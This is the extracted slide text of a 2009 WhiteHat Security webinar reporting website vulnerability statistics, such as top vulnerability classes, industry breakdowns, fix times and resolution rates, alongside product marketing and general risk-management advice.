whitehat security "website security statistics report" (q1'09)
DESCRIPTION
The WhiteHat Website Security Statistics Report provides a one-of-a-kind perspective on the state of website security and the issues that organizations must address to avert attack. WhiteHat has been publishing the report, which highlights the top ten vulnerabilities, vertical market trends and new attack vectors, since 2006. The WhiteHat report presents a statistical picture of current website vulnerabilities, accompanied by WhiteHat expert analysis and recommendations. WhiteHat’s report is the only one in the industry to focus solely on unknown vulnerabilities in custom Web applications, code unique to an organization, within real-world websites.TRANSCRIPT
© 2009 WhiteHat, Inc.
Jeremiah GrossmanFounder & Chief Technology Officer
7th Website Security Statistics Report
Webinar 05.19.2009
© 2009 WhiteHat, Inc. | Page
WhiteHat Security
2
• 200+ enterprise customers • Start-ups to Fortune 500
• Flagship offering “WhiteHat Sentinel Service”• 1000’s of assessments performed annually
• Recognized leader in website security• Quoted hundreds of times by the mainstream press
© 2009 WhiteHat, Inc. | Page
Web Security #1 Threat
3
The vast majority of websites possess serious vulnerabilities
Malicious website breaches are occurring in record numbers
"82% of websites have had at least one security issue, with 63 percent still having issues of high, critical or urgent severity.” (WhiteHat Security, 2008)
“70% of the top 100 most popular Web sites either hosted malicious content or contained a masked redirect to lure unsuspecting victims from legitimate sites to malicious sites.” (Websense, 2009)
PCI DSS Requirement 6.6 mandates application security“Ensure that web-facing applications are protected against known attacks by applying either of the following methods. A) Having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security.
Federal Trade Commission Fines and InvestigationsOver the last three years, the FTC has settled with fourteen businesses over alleged inadequate data security practices concerning how such businesses protect consumers' personal information.
© 2009 WhiteHat, Inc. | Page
WhiteHat Security - Website Risk Management• WhiteHat Sentinel Service
• Unlimited website vulnerability assessment
• SaaS-based, annual subscription model• Combination of proprietary scanning technology and expert operations team
• 200+ enterprise customers• 1000’s of assessments performed annually from start-ups to Fortune 500
Sentinel PE - Configured assessment delivery including comprehensive manual testing for business logic issues. For high-risk websites with sensitive data and performs critical business functions.
Sentinel SE - Configured assessment delivery with verified vulnerability reporting – designed for medium risk websites with complex functionality requiring extensive configuration.
Sentinel BE - Self-service, automated assessment delivery with verified vulnerability reporting – designed for smaller, less complex, lower risk websites.
© 2009 WhiteHat, Inc. | Page
WASC 24 (+2)* Classes of AttacksTechnical: Automation Can IdentifyCommand Execution
• Buffer Overflow• Format String Attack• LDAP Injection• OS Commanding• SQL Injection• SSI Injection• XPath Injection
Information Disclosure• Directory Indexing• Information Leakage• Path Traversal• Predictable Resource Location
Client-Side• Content Spoofing• Cross-site Scripting• HTTP Response Splitting*
Business Logic: Humans Required
Authentication• Brute Force• Insufficient Authentication• Weak Password Recovery Validation• CSRF*
Authorization• Credential/Session Prediction• Insufficient Authorization• Insufficient Session Expiration• Session Fixation
Logical Attacks• Abuse of Functionality• Denial of Service• Insufficient Anti-automation• Insufficient Process Validation
5
© 2009 WhiteHat, Inc. | Page 6
Data Set• Collection duration: January 1, 2006 to March 31, 2009• Total websites: 1,031• Identified vulnerabilities (custom web applications): 17,888• Assessment frequency: ~Weekly• Vulnerability classes: WASC Threat Classification• Severity naming convention: PCI-DSS
Key Findings• Unresolved vulnerabilities: 7,157 (60% resolution rate)• Websites having had at least one HIGH, CRITICAL, or URGENT issue: 82%• Lifetime average number of vulnerabilities per website: 17• Websites currently with at least one HIGH, CRITICAL, or URGENT issue: 63%• Current average of unresolved vulnerabilities per website: 7
Percentage likelihood of a website having a vulnerability by severity
URGENTHIGHCRITICAL
© 2009 WhiteHat, Inc. | Page 7
Cross-Site ScriptingInformation LeakageContent SpoofingInsufficient AuthorizationSQL InjectionPredictable Resource LocationSession FixationCross-Site Request ForgeryInsufficient AuthenticationHTTP Response Splitting
WhiteHat Security Top Ten
Percentage likelihood of a website having a vulnerability by class
• Average number of inputs per website: 227• Average ratio of vulnerability count / number of inputs: 2.58%
© 2009 WhiteHat, Inc. | Page 8
Overall Vulnerability Population
URL Extension % of websites
% of vulnerabilities
unknown 59% 40%
asp 24% 25%
aspx 23% 9%
xml 10% 2%
jsp 9% 8%
do 7% 3%
php 6% 3%
html 4% 2%
old 4% 1%
dll 4% 1%
cfm 3% 4%
© 2009 WhiteHat, Inc. | Page
Industry Vertical Analysis
9
Historical DecreaseCurrent
Retail
Financial
Service
s ITHealt
hcare
Pharma
Teleco
m
Insurance
Social
Networkin
g
Percentage likelihood of a website having at least one HIGH, CRITICAL, or URGENT issue by industry vertical
Retail
Pharmaceutical Telecom Insurance Social Networking
Financial Services IT Healthcare
Current Current Current CurrentHistorical Historical Historical Historical
Current Current Current CurrentHistorical Historical Historical Historical
Top 5 vulnerabilities by industry vertical. Percentage likelihood of a website having at least one HIGH, CRITICAL, or URGENT issue by class
© 2009 WhiteHat, Inc. | Page
Time-to-Fix (Days) - WhiteHat Top Ten
11
Best-case scenario: Not all vulnerabilities have been fixed...
Cross-Site Scripting
Information Leakage
Content Spoofing
Insufficient Authorization
SQL Injection
Predictable Resource Location
Session Fixation
Cross-Site Request Forgery
Insufficient Authentication
HTTP Response Splitting
© 2009 WhiteHat, Inc. | Page
Resolution rate - Top 5 by Severity
12
Class of Attack % resolved severityCross Site Scripting 20% urgentInsufficient Authorization 19% urgentSQL Injection 30% urgentHTTP Response Splitting 75% urgentDirectory Traversal 53% urgentInsufficient Authentication 38% criticalCross-Site Scripting 39% criticalAbuse of Functionality 28% criticalCross-Site Request Forgery 45% criticalSession Fixation 21% criticalBrute Force 11% highContent Spoofing 25% highHTTP Response Splitting 30% highInformation Leakage 29% highPredictable Resource Location 26% high
© 2009 WhiteHat, Inc. | Page 13
0
600
1,200
1,800
2,400
3,000
Verf
ied
Vuln
erab
ilitie
s
Vulnerability Checks
0
80
160
240
320
400
Vuln
erab
le W
ebsi
tes
Vulnerability Checks
The Long Tail of Website Vulnerability Testing
© 2009 WhiteHat, Inc. | Page
Threats / Attackers
14
‘The Analyzer’, allegedly hacked into a multiple financial institutions using SQL Injection to steal credit and debit card numbers that were then used by thieves in several countries to withdraw more than $1 million from ATMs.Geeks.com, Guess, Petco, CardSystems, USC, etc.
Cyber criminals use XSS vulnerabilities to create very convincing Phishing scams that appear on the real-website as opposed to a fake. JavaScript malware steals victims session cookies and passwords.Y! Mail, PayPal, SunTrust, Italian Banks,etc
With Mass SQL Injection automated worms insert malicious JavaScript IFRAMEs (pointing to malware servers) into back-end databases and used the capability to exploit unpatched Web browsers. According to Websense, “75 percent of Web sites with malicious code are legitimate sites that have been compromised.”
Threat Capabilities
Fully Targeted
Discover unlinked / hidden functionality
Exercise business processes
Customize Business Logic Flaw Exploits
Leverage information leakage
Interact with other customers
Perform multi-stage attacks
Directed Opportunistic
Authenticated crawling
Authenticated attacks
Intelligent HTML form submission
Test for technical vulnerabilities
Customize exploits
SQL Injection (data extraction)
Cross-Site Scripting (Phishing)
Random Opportunistic
Unauthenticated crawling
Unauthenticated attacks
Test all attack surface discovered
Destructive attacks
Automated HTML form submission
SQL Injection (code insertion)
Persistent Cross-Site Scripting
Advanced Filter Evasion Techniques
Generic exploits
1) Where do I start?Locate the websites you are responsible for
2) Where do I do next?Rank websites based upon business criticality
3) What should I be concerned about first?Random Opportunistic, Directed Opportunistic, Fully Targeted
4) What is our current security posture?Vulnerability assessments, pen-tests, traffic monitoring
5) How best to improve our survivability?SDL, virtual patch, configuration change, decommission, outsource, version roll-back, etc.
© 2009 WhiteHat, Inc. | Page
Operationalizing Website Security
15
Resources
Risk
What is your organizations tolerance for risk (per website)?
© 2009 WhiteHat, Inc. | Page 16
Website Risk Management Infrastructure
© 2009 WhiteHat, Inc.
Jeremiah GrossmanBlog: http://jeremiahgrossman.blogspot.com/Twitter: http://twitter.com/jeremiahgEmail: [email protected]
WhiteHat Securityhttp://www.whitehatsec.com/
Thank You!